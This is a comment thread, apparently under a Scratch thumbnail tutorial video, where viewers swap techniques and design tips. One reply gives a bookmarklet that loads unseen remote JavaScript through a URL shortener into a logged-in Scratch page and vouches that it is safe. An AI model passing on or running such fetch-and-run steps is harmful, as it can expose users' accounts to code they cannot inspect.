    ooh i haven't seen that thumbnail code before! i generally use the "timer > variable" hat block, as variables stop updating before the timer. i do get that the 3 minute video principle does make it hard to fit that in though, you barely got the code you had in the video yourself!

      You're totally right about the limitations of the 3-minute format. I'm aware of the timer approach, but decided the ghost approach would be an easier concept to teach. It also dovetails nicely with my earlier lesson on graphic effects (Hack #9)

    As a scratcher with experience in making thumbnails, This is a well made explanation of that process.

    This Tutorial Is Pretty Good! I used a different way to make thumbnails, but this way is a pretty cool one!

      Thanks! Another viewer mentioned the timer method, which also works great.

      Thanks! Miss Lynne is an artist, so she's really helped us up our thumbnail game.

    Hello! By any change do you or can you make a tutorial on how to have an animated thumbnail on a profile?

      Hi! LOL, I see you also left a message for me on my old channel. The tutorial was done by one of my students, but I went back and tried it out and it still works as described. I've been planning to update the old tutorial for this channel, but in the meantime, these are the steps.
      1. Go to this web page and bookmark it. x=document.createElement("script");x.src="//is.gd/thumb2"; void document.getElementsByTagName("head")[0].appendChild(x);
      It's a script, but the code is not harmful and I can assure you it's completely safe to run.
      2. Go to any scratch project and click on the bookmark. Your browser will prompt you to upload an animated gif.
      Your thumbnail should be updated. Hope this helps!

    Cooltext gives virus when we click "START"?

      I'm not sure what you're talking about. I just visited the website (cooltext.com) and I don't even see a Start button anywhere. I've used this site for years with no issue.

    I actually use scratch to make my TH-cam thumbnails, as well as my Scratch ones lol

      It's a pretty solid art tool. We pretty much exclusively use Scratch to make all the art for our videos.

    Also don't add many stuff to the thumbnail, or it will be too... unpleasant..
    Include the main character or the enemies if it is like a game where you fight, or just add the basic theme of the game...
